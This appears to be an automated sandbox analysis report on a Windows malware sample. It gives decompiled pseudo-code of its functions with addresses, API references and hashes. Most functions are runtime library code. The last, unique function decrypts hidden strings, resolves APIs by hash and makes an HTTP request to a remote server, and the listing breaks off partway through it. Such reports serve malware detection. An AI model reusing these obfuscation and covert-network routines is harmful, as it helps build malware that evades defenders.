																								_t311 = E0042A148(__eflags, _v712, 1, 0x43dac8, 0x7f,  &_v536,  *(_t424 + 8), 1);
																								_t471 = _t471 + 0x1c;
																								__eflags = _t311;
																								if(_t311 == 0) {
																									_t397 = _v712;
																								} else {
																									_t313 = _v712;
																									do {
																										 *(_t457 + _t313 * 2 - 0x20c) =  *(_t457 + _t313 * 2 - 0x20c) & 0x000001ff;
																										_t313 = _t313 + 1;
																										__eflags = _t313 - 0x7f;
																									} while (_t313 < 0x7f);
																									_t315 = E0041852C( &_v536,  *0x44b830, 0xfe);
																									_t471 = _t471 + 0xc;
																									__eflags = _t315;
																									_t397 = 0 | _t315 == 0x00000000;
																								}
																								_t449[1] = _t397;
																								 *_t449 =  *(_t424 + 8);
																							}
																							 *(_t424 + 0x18) = _t449[1];
																							goto L120;
																						}
																						__eflags = _t417;
																						if(_t417 != 0) {
																							 *_t449 =  *(_t449 + _t417 * 8);
																							_t449[1] =  *(_t449 + 4 + _t417 * 8);
																							 *(_t449 + _t417 * 8) = _v728;
																							 *(_t449 + 4 + _t417 * 8) = _v720;
																						}
																						goto L108;
																					}
																					L120:
																					_t290 = _t356 * 0xc;
																					_t198 = _t290 + 0x43db50; // 0x416150
																					 *0x437268(_t424);
																					_t292 =  *((intOrPtr*)( *_t198))();
																					_t389 = _v736;
																					__eflags = _t292;
																					if(_t292 == 0) {
																						__eflags = _t389 - 0x44b900;
																						if(_t389 == 0x44b900) {
																							L127:
																							_t293 = _v724;
																						} else {
																							_t448 = _t356 + _t356;
																							__eflags = _t448;
																							asm("lock xadd [eax], ecx");
																							if(_t448 != 0) {
																								goto L127;
																							} else {
																								E004214E2( *((intOrPtr*)(_t424 + 0x28 + _t448 * 8)));
																								E004214E2( *((intOrPtr*)(_t424 + 0x24 + _t448 * 8)));
																								E004214E2( *(_t424 + 0xa0 + _t356 * 4));
																								_t293 = _v724;
																								_t392 = _v712;
																								 *(_t293 + _t424) = _t392;
																								 *(_t424 + 0xa0 + _t356 * 4) = _t392;
																							}
																						}
																						_t390 = _v740;
																						 *_t390 = 1;
																						_t275 =  *(_t293 + _t424);
																						 *((intOrPtr*)(_t424 + 0x28 + (_t356 + _t356) * 8)) = _t390;
																					} else {
																						 *((intOrPtr*)(_v724 + _t424)) = _t389;
																						E004214E2( *(_t424 + 0xa0 + _t356 * 4));
																						 *(_t424 + 0xa0 + _t356 * 4) = _v748;
																						E004214E2(_v740);
																						 *(_t424 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			_t275 = _t415;
																			L123:
																			__eflags = _v16 ^ _t457;
																			E00415A87();
																			return _t275;
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t277 = _t276 | 0x00000001;
																	__eflags = _t277;
																	goto L91;
																}
															} else {
																_t321 = _t439 + _t439;
																__eflags = _t321 - 0x106;
																if(_t321 >= 0x106) {
																	E00416335();
																	goto L82;
																} else {
																	 *((short*)(_t455 + _t321 - 0x10c)) = 0;
																	_t323 =  &_v276;
																	_push(_t323);
																	_push(_v456);
																	_push(_t420);
																	L83();
																	_t373 = _v452;
																	_t464 = _t467 + 0xc;
																	__eflags = _t323;
																	if(_t323 != 0) {
																		_t373 = _t373 + 1;
																		_v452 = _t373;
																	}
																	L54:
																	_t436 = _t351 + _t439 * 2;
																	_t262 =  *_t436 & 0x0000ffff;
																	_t411 = _t262;
																	__eflags = _t262;
																	if(_t262 != 0) {
																		_t436 = _t436 + 2;
																		__eflags = _t436;
																		_t411 =  *_t436 & 0x0000ffff;
																	}
																	__eflags = _t411;
																	if(_t411 != 0) {
																		continue;
																	} else {
																		__eflags = _t373;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t324 = 0x3b;
														__eflags =  *_t351 - _t324;
														if( *_t351 != _t324) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L131;
										}
										_t248 = 0;
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t436;
						if(_t436 == 0) {
							_t248 =  *(_t420 + (_t248 + 2 + _t248 + 2) * 8);
						} else {
							_push(_t436);
							_push(_t248);
							_push(_t420);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t455;
						E00415A87();
						return _t248;
					}
				}
				L131:
			}

0x004244ed
0x004244ed
0x004244f0
0x004244f2
0x004244f5
0x004244f6
0x004244ff
0x00424507
0x00424509
0x0042450b
0x0042450e
0x0042462b
0x00424630
0x00424514
0x00424514
0x00424515
0x00424515
0x00424518
0x0042451b
0x0042451d
0x00424520
0x00424523
0x00424525
0x00424528
0x0042452d
0x0042453b
0x00424545
0x00424548
0x0042454b
0x0042454b
0x00424556
0x0042455b
0x00424560
0x00000000
0x00424566
0x00424569
0x00424569
0x0042456c
0x0042456e
0x00424571
0x00424573
0x00424573
0x00424573
0x00424576
0x00424576
0x00424576
0x0042457c
0x00000000
0x00000000
0x00424581
0x00424598
0x00424598
0x00424583
0x00424583
0x0042458b
0x00000000
0x0042458d
0x0042458d
0x00424590
0x00424596
0x00000000
0x00000000
0x00000000
0x00000000
0x00424596
0x0042458b
0x004245a1
0x004245a1
0x004245a6
0x004245ab
0x004245af
0x004245bb
0x004245be
0x004245c1
0x004245cb
0x004245d3
0x004245db
0x00000000
0x004245e1
0x004245e5
0x00424632
0x0042463b
0x0042463e
0x00424640
0x00424644
0x00424648
0x0042464d
0x00424652
0x00424648
0x00424656
0x00424658
0x0042465a
0x0042465e
0x0042465f
0x00424664
0x00424669
0x0042465f
0x0042466c
0x0042466f
0x00424672
0x00424675
0x00424678
0x004245e7
0x004245ea
0x004245ed
0x004245ef
0x004245f3
0x004245f7
0x004245fc
0x00424601
0x004245f7
0x00424607
0x00424609
0x0042460e
0x00424613
0x00424618
0x0042460e
0x00424619
0x0042461d
0x0042461d
0x00424620
0x00424624
0x00424627
0x00424627
0x00000000
0x0042462a
0x00000000
0x004245db
0x0042459c
0x0042459e
0x0042459e
0x00000000
0x0042459e
0x0042467f
0x00424680
0x00424681
0x00424682
0x00424683
0x00424684
0x00424689
0x0042468c
0x0042468d
0x0042468f
0x00424695
0x0042469c
0x0042469f
0x004246a2
0x004246a3
0x004246a4
0x004246a7
0x004246a8
0x004246ab
0x004246b1
0x004246b3
0x004246d8
0x004246e2
0x004246e8
0x004246ea
0x004246f0
0x004246f2
0x0042494c
0x0042494d
0x00000000
0x004246f8
0x004246f8
0x004246fc
0x0042486a
0x00424881
0x00424886
0x00424889
0x0042488b
0x00424891
0x00424891
0x00424893
0x00424896
0x00424898
0x0042489e
0x0042489e
0x004248a0
0x00424927
0x00424927
0x004248a6
0x004248a6
0x004248a8
0x004248ae
0x004248b1
0x004248b4
0x004248ba
0x00000000
0x00000000
0x004248bc
0x004248c0
0x004248e9
0x004248e9
0x004248eb
0x004248c2
0x004248c2
0x004248c6
0x004248ca
0x004248d1
0x004248d7
0x00000000
0x004248d9
0x004248d9
0x004248dc
0x004248df
0x004248e7
0x00000000
0x00000000
0x00000000
0x00000000
0x004248e7
0x004248d7
0x004248f6
0x004248f6
0x004248f8
0x00424926
0x00424926
0x00000000
0x004248fa
0x004248fa
0x00424900
0x00424901
0x00424902
0x00424903
0x00424908
0x0042490e
0x00424911
0x00424913
0x0042491a
0x0042491c
0x0042491e
0x00424915
0x00424915
0x00424916
0x00000000
0x00424916
0x00424913
0x00000000
0x004248f8
0x004248ef
0x004248f1
0x004248f4
0x004248f4
0x00000000
0x004248f4
0x0042492d
0x0042492d
0x0042492e
0x00424931
0x00424937
0x00424937
0x00424940
0x00424942
0x00000000
0x00424944
0x00424944
0x00424946
0x00000000
0x00424948
0x00424948
0x00424948
0x00424946
0x00424942
0x00000000
0x00424702
0x00424702
0x00424707
0x00000000
0x0042470d
0x0042470d
0x00424712
0x00000000
0x00424718
0x00424718
0x0042471e
0x00424723
0x00424725
0x0042472c
0x0042472d
0x0042472f
0x00000000
0x00000000
0x00424735
0x00424735
0x00424739
0x0042473f
0x00000000
0x00424745
0x00424747
0x00424748
0x0042474b
0x00000000
0x00424751
0x00424751
0x00424757
0x0042475c
0x00424766
0x0042476a
0x0042476f
0x00424772
0x00424774
0x00000000
0x00424776
0x00424776
0x00424778
0x0042477b
0x0042477b
0x0042477e
0x00424781
0x00424781
0x0042478c
0x0042478e
0x00424790
0x00000000
0x00000000
0x00424790
0x00000000
0x00424792
0x00424792
0x00424798
0x0042479b
0x0042479b
0x004247a9
0x004247b2
0x004247b7
0x004247bd
0x004247c0
0x004247c1
0x004247c3
0x004247d1
0x004247d1
0x004247d8
0x00424839
0x00000000
0x004247da
0x004247da
0x004247e8
0x004247ed
0x004247f0
0x004247f2
0x00424969
0x0042496b
0x0042496c
0x0042496d
0x0042496e
0x0042496f
0x00424970
0x00424975
0x00424978
0x00424979
0x00424981
0x00424988
0x0042498b
0x0042498c
0x0042498f
0x00424993
0x00424994
0x00424997
0x004249a7
0x004249ca
0x004249cf
0x004249d2
0x004249d4
0x00424cac
0x00424cac
0x00424cac
0x00000000
0x004249da
0x004249da
0x004249dd
0x004249dd
0x004249e0
0x004249e6
0x004249ec
0x004249ef
0x004249f1
0x004249f4
0x004249fb
0x004249fe
0x00424a04
0x00000000
0x00000000
0x00424a06
0x00424a0a
0x00424a33
0x00424a33
0x00424a0c
0x00424a0c
0x00424a10
0x00424a14
0x00424a1b
0x00424a21
0x00000000
0x00424a23
0x00424a23
0x00424a26
0x00424a29
0x00424a31
0x00000000
0x00000000
0x00000000
0x00000000
0x00424a31
0x00424a21
0x00424a40
0x00424a40
0x00424a42
0x00424a4b
0x00424a51
0x00424a54
0x00424a54
0x00424a57
0x00424a5a
0x00424a5a
0x00424a6a
0x00424a78
0x00424a7d
0x00424a84
0x00424a86
0x00000000
0x00424a8c
0x00424a92
0x00424a9f
0x00424aa8
0x00424abb
0x00424ac2
0x00424ac7
0x00424aca
0x00424acc
0x00424d2e
0x00424d34
0x00424d35
0x00424d36
0x00424d37
0x00424d38
0x00424d39
0x00424d3e
0x00424d3f
0x00424d45
0x00424ad2
0x00424ad2
0x00424ae0
0x00424ae3
0x00424af9
0x00424b00
0x00424b06
0x00424ae5
0x00424ae5
0x00424aed
0x00000000
0x00424aef
0x00424aef
0x00424af5
0x00424af5
0x00424aed
0x00424b0c
0x00424b13
0x00424b16
0x00424c36
0x00424c39
0x00424c46
0x00424c49
0x00424c51
0x00424c51
0x00424c3b
0x00424c41
0x00424c41
0x00424b1c
0x00424b1c
0x00424b22
0x00424b2a
0x00424b2c
0x00424b2f
0x00424b38
0x00424b41
0x00424b47
0x00424b4a
0x00424b4c
0x00000000
0x00000000
0x00424b4e
0x00424b54
0x00424b55
0x00424b60
0x00424b68
0x00424b70
0x00424b73
0x00424b76
0x00424b7c
0x00424b82
0x00424b88
0x00424b8e
0x00424b91
0x00000000
0x00000000
0x00424b93
0x00424bb8
0x00424bb8
0x00424bbb
0x00424bd8
0x00424bdd
0x00424be0
0x00424be2
0x00424c20
0x00424be4
0x00424be4
0x00424bea
0x00424bef
0x00424bf7
0x00424bf8
0x00424bf8
0x00424c0f
0x00424c16
0x00424c19
0x00424c1b
0x00424c1b
0x00424c26
0x00424c2c
0x00424c2c
0x00424c31
0x00000000
0x00424c31
0x00424b95
0x00424b97
0x00424b9c
0x00424ba2
0x00424bab
0x00424bb4
0x00424bb4
0x00000000
0x00424b97
0x00424c54
0x00424c54
0x00424c58
0x00424c60
0x00424c66
0x00424c69
0x00424c6f
0x00424c71
0x00424cbf
0x00424cc5
0x00424d11
0x00424d11
0x00424cc7
0x00424ccc
0x00424ccc
0x00424cd2
0x00424cd6
0x00000000
0x00424cd8
0x00424cdc
0x00424ce5
0x00424cf1
0x00424cf6
0x00424cff
0x00424d05
0x00424d08
0x00424d08
0x00424cd6
0x00424d17
0x00424d1f
0x00424d25
0x00424d28
0x00424c73
0x00424c79
0x00424c83
0x00424c95
0x00424c9c
0x00424ca9
0x00000000
0x00424ca9
0x00000000
0x00424c71
0x00424acc
0x00424a44
0x00424a44
0x00424cae
0x00424cb3
0x00424cb6
0x00424cbe
0x00424cbe
0x00000000
0x00424a42
0x00424a3b
0x00424a3d
0x00424a3d
0x00000000
0x00424a3d
0x004247f8
0x004247f8
0x004247fb
0x00424800
0x00424964
0x00000000
0x00424806
0x00424808
0x00424810
0x00424816
0x00424817
0x0042481d
0x0042481e
0x00424823
0x00424829
0x0042482c
0x0042482e
0x00424830
0x00424831
0x00424831
0x0042483f
0x0042483f
0x00424842
0x00424845
0x00424847
0x0042484a
0x0042484c
0x0042484c
0x0042484f
0x0042484f
0x00424852
0x00424855
0x00000000
0x0042485b
0x0042485b
0x0042485d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0042485d
0x00424855
0x00424800
0x004247f2
0x004247c5
0x004247c7
0x004247c8
0x004247cb
0x00000000
0x00000000
0x00000000
0x00000000
0x004247cb
0x004247c3
0x0042474b
0x00000000
0x0042473f
0x00424863
0x00000000
0x00424863
0x00424712
0x00424707
0x004246fc
0x004246b5
0x004246b5
0x004246b7
0x004246ce
0x004246b9
0x004246b9
0x004246ba
0x004246bb
0x004246bc
0x004246c1
0x00424953
0x00424958
0x0042495b
0x00424963
0x00424963
0x004246b3
0x00000000

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: _free$Process$AllocateCurrentFeatureHeapPresentProcessorTerminate___report_securityfailure_memcmp
String ID:
API String ID: 1143044725-0
Opcode ID: 2c22926a8b9d768bc8cd856fe8324156cf61dc80d426b9c136b66b12cf622ac8
Instruction ID: 3e11c5c72805cf1d559b7d4fdbe9c0aa39670d5adbe5865a525c433b8de29691
Opcode Fuzzy Hash: 2c22926a8b9d768bc8cd856fe8324156cf61dc80d426b9c136b66b12cf622ac8
Instruction Fuzzy Hash: AE510371B00214AFDB20DF69E881B6A77F4EF99724F50456FE809D7250E739D941CB88

Uniqueness

Uniqueness Score: 0.00%

Function 00422DBF, Relevance: 7.6, APIs: 5, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00422DBF(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t27;
				signed int _t29;
				intOrPtr _t33;
				signed int _t38;
				signed int _t41;
				void* _t46;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				signed int _t69;
				signed int* _t70;
				signed int _t74;
				void* _t75;

				_t63 = __edx;
				_v12 = __ecx;
				_t27 =  *__ecx;
				_t70 =  *_t27;
				if(_t70 == 0) {
					L14:
					return _t27 | 0xffffffff;
				}
				_t29 =  *0x44b6b4; // 0x4a5cc10f
				_t2 =  &(_t70[1]); // 0x476ff57
				_t50 =  *_t70 ^ _t29;
				_t3 =  &(_t70[2]); // 0xce8b36ff
				_t67 =  *_t2 ^ _t29;
				_t72 =  *_t3 ^ _t29;
				asm("ror edi, cl");
				asm("ror esi, cl");
				asm("ror ebx, cl");
				if(_t67 != _t72) {
					L13:
					 *_t67 = E004258B7( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
					_t33 = E00419EA6(_t50);
					_t51 = _v12;
					 *((intOrPtr*)( *((intOrPtr*)( *_t51)))) = _t33;
					_t23 = _t67 + 4; // 0x40265a
					 *((intOrPtr*)( *((intOrPtr*)( *_t51)) + 4)) = E00419EA6(_t23);
					 *((intOrPtr*)( *((intOrPtr*)( *_t51)) + 8)) = E00419EA6(_t72);
					return 0;
				}
				_t38 = 0x200;
				_t74 = _t72 - _t50 >> 2;
				if(_t74 <= 0x200) {
					_t38 = _t74;
				}
				_t68 = _t38 + _t74;
				if(_t68 == 0) {
					_t68 = 0x20;
				}
				if(_t68 < _t74) {
					L8:
					_t7 = _t74 + 4; // 0xce8b3703
					_t68 = _t7;
					_v8 = E0042D525(_t50, _t68, 4);
					_t27 = E004214E2(0);
					_t61 = _v8;
					_t75 = _t75 + 0x10;
					if(_t61 == 0) {
						goto L14;
					}
					goto L9;
				} else {
					_v8 = E0042D525(_t50, _t68, 4);
					E004214E2(0);
					_t61 = _v8;
					_t75 = _t75 + 0x10;
					if(_t61 != 0) {
						L9:
						_t50 = _t61;
						_v8 = _t61 + _t74 * 4;
						_t72 = _t61 + _t68 * 4;
						_t41 =  *0x44b6b4; // 0x4a5cc10f
						_t67 = _v8;
						_t62 = _t67;
						_v16 = _t41;
						asm("sbb edx, edx");
						_t65 =  !_t63 & _t61 + _t68 * 0x00000004 - _t67 + 0x00000003 >> 0x00000002;
						if(_t65 == 0) {
							goto L13;
						}
						_t69 = _v16;
						_t46 = 0;
						do {
							_t46 = _t46 + 1;
							 *_t62 = _t69;
							_t18 = _t62 + 4; // 0x2d3be800
							_t62 = _t18;
						} while (_t46 != _t65);
						_t67 = _v8;
						goto L13;
					}
					goto L8;
				}
			}

0x00422dbf
0x00422dc9
0x00422dce
0x00422dd1
0x00422dd5
0x00422ee0
0x00000000
0x00422ee0
0x00422ddb
0x00422de7
0x00422dea
0x00422dec
0x00422def
0x00422df1
0x00422df3
0x00422df5
0x00422df7
0x00422dfb
0x00422e9e
0x00422eac
0x00422eae
0x00422eb3
0x00422eba
0x00422ebc
0x00422eca
0x00422ed9
0x00000000
0x00422edc
0x00422e03
0x00422e08
0x00422e0d
0x00422e0f
0x00422e0f
0x00422e11
0x00422e16
0x00422e1a
0x00422e1a
0x00422e1d
0x00422e3c
0x00422e3e
0x00422e3e
0x00422e4a
0x00422e4d
0x00422e52
0x00422e55
0x00422e5a
0x00000000
0x00000000
0x00000000
0x00422e1f
0x00422e2a
0x00422e2d
0x00422e32
0x00422e35
0x00422e3a
0x00422e60
0x00422e63
0x00422e65
0x00422e68
0x00422e6b
0x00422e70
0x00422e73
0x00422e75
0x00422e84
0x00422e88
0x00422e8a
0x00000000
0x00000000
0x00422e8c
0x00422e8f
0x00422e91
0x00422e91
0x00422e92
0x00422e94
0x00422e94
0x00422e97
0x00422e9b
0x00000000
0x00422e9b
0x00000000
0x00422e3a

APIs

_free.LIBCMT ref: 00422E2D
_free.LIBCMT ref: 00422E4D

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00422EAE
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00422EC0
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00422ECD

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: __crt_fast_encode_pointer$_free$ErrorFreeHeapLast
String ID:
API String ID: 1210940017-0
Opcode ID: a7f84887026d840f98a27d63ef8f7524198c328d864285b1c9076a2bf0f99fe7
Instruction ID: 673d800b9cc33b7d10b52de5835f88d26e84ad4bc68fb307574937fb6e4a5b4e
Opcode Fuzzy Hash: a7f84887026d840f98a27d63ef8f7524198c328d864285b1c9076a2bf0f99fe7
Instruction Fuzzy Hash: 2841F636B00220AFCB10DF69D980A5AB3F6EF89714B56446EE905EB351D775ED01CB84

Uniqueness

Uniqueness Score: 1.34%

Function 0042DFDC, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0042DFDC(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x44b7b8; // 0x44b80c
					if(_t23 != 0) {
						E004214E2(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x44b7bc; // 0x44dbd8
					if(_t24 != 0) {
						E004214E2(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x44b7c0; // 0x44dbd8
					if(_t25 != 0) {
						E004214E2(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x44b7e8; // 0x44b810
					if(_t26 != 0) {
						E004214E2(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x44b7ec; // 0x44dbdc
					if(_t27 != 0) {
						return E004214E2(_t6);
					}
				}
				return _t6;
			}

0x0042dfe2
0x0042dfe7
0x0042dfeb
0x0042dff1
0x0042dff4
0x0042dff9
0x0042dffd
0x0042e003
0x0042e006
0x0042e00b
0x0042e00f
0x0042e015
0x0042e018
0x0042e01d
0x0042e021
0x0042e027
0x0042e02a
0x0042e02f
0x0042e030
0x0042e033
0x0042e039
0x00000000
0x0042e041
0x0042e039
0x0042e044

APIs

_free.LIBCMT ref: 0042DFF4
_free.LIBCMT ref: 0042E006
_free.LIBCMT ref: 0042E018
_free.LIBCMT ref: 0042E02A
_free.LIBCMT ref: 0042E03C

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,0042E280,?,00000000,?,?,?,0042E525,?,00000007,?,?,0042E964,?,?), ref: 0042150A

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3b0a6bafa28dc323377888c04a1ad062d12cfa4ac26dfa5f0c5328128cfc929f
Instruction ID: 7c7f8483ebab91c239f2b841b27817feeef3254e173dad6808658ff3291e97c9
Opcode Fuzzy Hash: 3b0a6bafa28dc323377888c04a1ad062d12cfa4ac26dfa5f0c5328128cfc929f
Instruction Fuzzy Hash: 79F04F32704230ABC630EBAAFAC1C0B77D9EA447143E4880AF409D7611CB7CFC808A9C

Uniqueness

Uniqueness Score: 0.14%

Function 0042DFDC, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0042DFF4
_free.LIBCMT ref: 0042E006
_free.LIBCMT ref: 0042E018
_free.LIBCMT ref: 0042E02A
_free.LIBCMT ref: 0042E03C

Part of subcall function 004214E2: HeapFree.KERNEL32(00000000,00000000), ref: 004214F8
Part of subcall function 004214E2: GetLastError.KERNEL32(?,?,00422FA2), ref: 0042150A

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: caf486a057bcf29f9a63bdcc699e47559ccfd5acfc24b3fbc5c86e3e667ed123
Instruction ID: 7c7f8483ebab91c239f2b841b27817feeef3254e173dad6808658ff3291e97c9
Opcode Fuzzy Hash: caf486a057bcf29f9a63bdcc699e47559ccfd5acfc24b3fbc5c86e3e667ed123
Instruction Fuzzy Hash: 79F04F32704230ABC630EBAAFAC1C0B77D9EA447143E4880AF409D7611CB7CFC808A9C

Uniqueness

Uniqueness Score: 0.14%

Function 0040703E, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 214
UNIQUE

Download Yara Rule

C-Code - Quality: 40%

			E0040703E(void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				short _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				short _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				char _v244;
				char _v248;
				intOrPtr _v252;
				char _v256;
				short _v1278;
				char _v1280;
				short _v3328;
				void* __ebx;
				void* _t81;
				intOrPtr* _t82;
				intOrPtr* _t84;
				char _t85;
				void* _t91;
				void* _t93;
				intOrPtr* _t94;
				intOrPtr* _t100;
				intOrPtr* _t103;
				intOrPtr* _t105;
				signed int _t106;
				intOrPtr* _t107;
				intOrPtr _t108;
				void* _t109;
				char _t110;
				void* _t131;
				intOrPtr _t134;
				void* _t136;
				intOrPtr* _t137;

				_v244 = 0x1c381dd7;
				_v240 = 0xc67c7261;
				_v236 = 0x6fdd95a0;
				_v232 = 0x28fd5c44;
				_v228 = 0xa4b4af22;
				_v224 = 0xa4b4afa8;
				_v220 = 0x85f91bd9;
				_v216 = 0x5afa20d6;
				_v212 = 0xbe5d039f;
				_v208 = 0x578a31c3;
				_v204 = 0xedf1a706;
				_v200 = 0x3b761904;
				_v196 = 0xafd5ba8e;
				_v192 = 0x615eaaed;
				_v188 = 0xda3f584e;
				_v184 = 0xc48bc113;
				_v180 = 0xed8e2a7f;
				_v176 = 0x50f10a3c;
				_v172 = 0x36415768;
				_v168 = 0xf6c30b99;
				_v164 = 0xad73f91c;
				_v160 = 0xb472eebb;
				_v156 = 0x7ceab380;
				_v152 = 0xbbafca26;
				_v148 = 0xfb1923ed;
				_v144 = 0xc3053cee;
				_v140 = 0x3eb0c771;
				_v136 = 0xc0a6ac87;
				_v132 = 0x14cd844f;
				_v128 = 0x90e5c9cd;
				_v124 = 0x2519be52;
				_v120 = 0xc879e392;
				_v116 = 0x54758173;
				_v112 = 0xe2a4d6b2;
				_v108 = 0x4559dadf;
				_v104 = 0x87713260;
				_v100 = 0x6f378468;
				_v96 = 0x14c3fd9a;
				_v92 = 0xc3de2d46;
				_v88 = 0x3c30db67;
				_v84 = 0xf33;
				_t81 = E00407563( &_v244);
				 *_t137 = 0x8593dc1;
				_t131 = _t81;
				_t82 = E004010BB(_t109);
				_t110 = 0;
				_t134 =  *_t82(_t131, 0, 0, 0, 0, 6);
				_v252 = _t134;
				if(_t134 != 0) {
					L2:
					_t84 = E004010BB(_t110, 6, 0xbe618d28);
					_t85 =  *_t84(_t134, _a4, 0x50, _t110, _t110, 3, _t110, _t110);
					_v248 = _t85;
					if(_t85 != 0) {
						wsprintfW( &_v3328, "/");
						_v36 = 0x3ded49fe;
						_v32 = 0xfee8fe50;
						_v28 = 0x6563c96;
						_v24 = 0x1babb1c1;
						_v20 = 0xa23293f7;
						_v16 = 0xa23293ff;
						_v12 = 0xcf9e1e21;
						_v8 = 0xa8db58cd;
						_t91 = E00407563( &_v36);
						_v80 = 0xcdb46798;
						_v76 = 0xceea8b8e;
						_v72 = 0x78bfea73;
						_v68 = 0x22f4f759;
						_v64 = 0xd1251ef;
						_v60 = 0xd1251fd;
						_v56 = 0xdf23d3ef;
						_v52 = 0x7cc9d297;
						_v48 = 0xe14a889f;
						_v44 = 0x2825df9b;
						_v40 = 0xac60;
						_t93 = E00407563( &_v80);
						_t94 = E004010BB(_t110, 6, 0x15100039);
						_t133 = _v248;
						_t136 =  *_t94(_v248, _t91,  &_v3328, _t93, _t110, _t110, 0x8424f700, _t110);
						if(_t136 != 0) {
							_v256 = 0x400;
							E0040C437( &_v1280, 0x400);
							_v248 = _t110;
							_t100 = E004010BB(_t110, 6, 0x9f13857c);
							_push(_t110);
							_push(_t110);
							_push(_t110);
							_push(_t110);
							_push(_t136);
							if( *_t100() != 0) {
								_t103 = E004010BB(_t110, 6, 0x2f5ce027);
								_push( &_v248);
								_push( &_v256);
								_push( &_v1280);
								_push(0x13);
								_push(_t136);
								if( *_t103() != 0) {
									_v1278 = 0x78;
									_t105 = E004010BB(_t110, 1, 0x515be757);
